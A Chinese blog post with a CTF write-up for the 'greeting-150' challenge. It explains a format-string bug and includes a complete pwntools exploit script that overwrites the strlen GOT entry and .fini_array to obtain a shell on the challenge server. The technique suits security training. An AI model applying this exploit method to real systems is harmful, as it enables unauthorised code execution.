pwn-greeting-150

最新推荐文章于 2022-04-10 11:33:21 发布
最新推荐文章于 2022-04-10 11:33:21 发布
阅读量290 收藏
点赞数
分类专栏: pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43647628/article/details/120227966
版权

1.题目

1.1.保护机制

canary+nx

1.2.关键代码

main函数
在这里插入图片描述
getnline函数
在这里插入图片描述

2.思路

重点1:很明显是个格式化字符串漏洞,之前说过格式化字符串可以将任意一个即将调用的函数的got覆盖成我们想要调用函数的plt,这里我们看了一遍,可以将strlen改成system,刚好输入参数/bin/sh\x00可以getshell

重点2:可是我们发现这个程序是没有循环的,就是说发生格式化字符串漏洞后程序就结束了,调用不到getnline,为了让程序循环,我查询资料后发现程序开始时会遍历init_array指针数组,调用数组中每一个函数进行初始化,结束时会遍历fini_array指针数组,调用数组中每一个函数进行清理操作,所以想到用格式化字符串漏洞将fini_array中第一个指针覆盖成main_addr

重点3:由于要覆盖的参数过多,我们应该精心布置字符串,首先前面应该放置要被覆盖的地址,然后由于每次覆盖4字节会导致字符串过长,我们可以每次覆盖2字节(hhn,hn,n,lln分别代表1,2,4,8字节),然后从小到大进行覆盖

from pwn import *
from ctypes import *
from LibcSearcher import *

context(arch="amd64",os="linux",log_level="debug")
con = remote('111.200.241.244',51569)
#con = process('./pwn')
elf = ELF('./pwn')
strlen_got = elf.got['strlen']
system_plt = elf.plt['system']
start_plt = 0x080484F0
fini_got = 0x08049934

addr = [0x804,0x8490,0x85ED]

payload = "a"*2
payload += p32(strlen_got+2)
payload += p32(strlen_got)
payload += p32(fini_got)

num = addr[0] - 32
payload += "%" + str(num) + "c%12$hn"
num = addr[1] - addr[0]
payload += "%" + str(num) + "c%13$hn"
num = addr[2] - addr[1]
payload += "%" + str(num) + "c%14$hn"

con.sendlineafter("... ",payload)

con.sendlineafter("... ","/bin/sh\x00")
con.interactive()
醉等佳人归
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
攻防世界PWN之greeting-150题解
seaaseesa的博客
11-09 1977
greeting-150 首先看一下保护机制 然后我们拖入IDA,发现是一个很简单的程序。 然而,最后的那个printf(&s);存在格式化字符串漏洞,可以造成任意地址的读写。 首先,我们需要确定我们输入的数据的相对位置。 经过测试,我们需要在前面填充2个字符,然后接下来我们的数据会位于第12个位置 那么,我们的payload = ‘aa’ + p32(a...
攻防世界 Pwn greeting-150
MrTreebook的博客
02-26 551
攻防世界 Pwn greeting-1501.checksec检查保护2.IDA查看程序流程3.程序分析4.exp 1.checksec检查保护 root@ubuntu:~/Desktop/git/ctf-pwn# checksec secret_file [*] '/home/lwj/Desktop/git/ctf-pwn/secret_file' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary fou
攻防世界进阶区——greeting-150
weixin_62675330的博客
04-10 4340
攻防世界进阶区——greeting-150 进阶区的格式化字符串漏洞,能做到这里的人肯定不差,我就不在重复写那些基础的东西了。 这里我尝试用了一下格式化字符串漏洞神器 FmtStr。 文件分析 先用checksec来查一下 coke@ubuntu:~/桌面/CTFworkstation/PWN/OADW/gretting_150$ checksec greeting_150 [*] '/home/coke/桌面/CTFworkstation/PWN/OADW/gretting_150/greeting_15
攻防世界之greeting-150
qq_42728977的博客
11-03 1562
题目链接:greeting-150 原理: 格式化字符串漏洞、覆盖 .fini_array 目的: 用格式化字符串漏洞制造程序循环,进而使普通格式化字符串漏洞可以被利用 环境: ubuntu14 64位 工具: pwntools 步骤: 用格式化字符串漏洞修改strlen或其他函数(能被调用且有可操纵字符串传入的函数)的got表为system地址plt地址,以及 .fini_array的4个字节为...
攻防世界PWN之RC4题解
seaaseesa的博客
02-06 543
RC4 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,存在栈溢出漏洞 由于开启了canary,因此,我们需要泄露canary,由于低位覆盖泄露出来的信息是加密的,解密可能比较麻烦,我们另选其他方法。功能a里有一个不起眼的漏洞 后面,输出了v7的内容 然而,v6和v7仅仅在dword_6020CC = 0时被初始化,如果它们未初始化,其值会是什么? 如果v...
pwn-200题目文件
02-16
pwn-200题目文件
pwn-me-backend
03-28
"pwn-me-backend" 是一个基于Java开发的后端项目,根据其命名,可能是用于网络安全教育或CTF(Capture The Flag)竞赛中的一个靶场平台。这个项目可能包含了一些漏洞,目的是让学习者或者参赛者通过逆向工程、内存...
PWN-Challenges
03-17
在"PWN-Challenges-main"这个压缩包中,我们可以期待找到一系列与PWN相关的练习题目和解决方案。这些挑战可能包括: 1. **基础PWN知识**:了解C/C++程序中的内存布局,如栈、堆、全局变量、BSS段等,以及它们在漏洞...
ADworld pwn wp - greeting-150
fa1c4的blog
06-27 211
格式化漏洞 这里可以任意地址读写, 思路是将got表中strlen的内容修改成system的plt, 这样调用strlen函数时, 相当于调用system, 在buf中写入"/bin/sh"就可以get shell
171222 pwn-CGCTF(pwn150
whklhhhh的博客
12-22 1658
1625-5 王子昂 总结《2017年12月22日》 【连续第448天总结】 A. CGCTF-cgpwna B. 简单的栈溢出,作为复习用的第一题233结果还是折腾了好久 基本概念不清啦很明显,message函数中存在栈溢出 A和n是全局变量,s是栈上的局部变量虽然s的长度受限,但是因为是全局变量所以可以通过A的溢出来修改n 它们在bss段,发现n紧接着A后面,A的长度是28字节,
攻防世界格式化字符串漏洞greeting150
Rt1Text的博客
04-10 420
1.checksec+运行 32位/NX堆栈不可执行/Canary保护 注意一点:没有RELRO保护,got表完全可写 2.IDA常规操作 1.main函数 2.getnline函数 看到以上信息可以 泄露任意地址的内存 但是........上面的看着感觉不是很多对 原来是这样 出现了aaaa---->0x61616161,参数在格式化字符串第12个位置 aaaaaa%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,...
全国大学生信息安全竞赛writeup--careful(pwn150)
jmp esp
07-10 3052
描述其实没有描述。。就是一个文件,careful. 打开发现输入index和value,10个之后会打出来一个数组。思路先逆向,ida看看。 main函数很简单,return一个init_array。 到init_array里边就比较好玩了,不想看汇编直接f5,大致函数如下int initarray() { int result; char s[20]; int v2;
mma-ctf-2nd-2016——greeting-150
05-08 495
32位程序,没开PIE  #stringformat 程序逻辑 1 int __cdecl main(int argc, const char **argv, const char **envp) 2 { 3 char s; // [esp+1Ch] [ebp-84h] 4 char v5; // [esp+5Ch] [ebp-44h] 5 u...
pwn system(“/bin/sh“)失败的原因
weixin_42016744的博客
01-11 1910
这里写自定义目录标题现象原因 现象 栈溢出做pwn 题跳转到system("/bin/sh")报错 打开gdb调试发现报错: 得知glibc2.27以后引入xmm寄存器, 记录程序状态, 会执行movaps指令, 要求rsp是按16字节对齐的, 所以如果payload这样写 payload = cyclic(0x20 + 8) + p64(pop_rdi_addr) + p64(binsh_addr) + p64(system_addr) 弹出的数据是奇数个, 本地就会报错 但是改成偶数个pop payl
攻防世界Pwn之1000levels
qq_42728977的博客
01-17 430
标题: MMA CTF 2nd 2016 : greeting-150 原理: 栈溢出,爆破system地址,绕过PIE保护。 做题环境: ubuntu14 64位 工具: pwntools、LibcSearcher 步骤: 根据程序逻辑爆破system地址,进而计算出libc_base,进而构造ROP链获得shell。 具体流程: 用checksec查看保护:发现有PIE保护,即地址无关可执行文...
Linux下的程序调试——GDB
weiyinchao88
02-02 543
无论是多么优秀的程序员,都难以保证自己在编写代码时不会出现任何错误,因此调试是软件开发过程中的一个必不可少的 组成部分。当程序完成编译之后,它很可能无法正常运行,或者会彻底崩溃,或者不能实现预期的功能。此时如何通过调试找到问题的症结所在,就变成了摆在开发 人员面前最严峻的问题。通常说来,软件项目的规模越大,调试起来就会越困难,越需要一个强大而高效的调试器作为后盾。对于Linux程序员来讲,目前可供...
python小程序代码.docx
最新发布
07-19
python小程序代码
攻防世界pwn-forgot
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值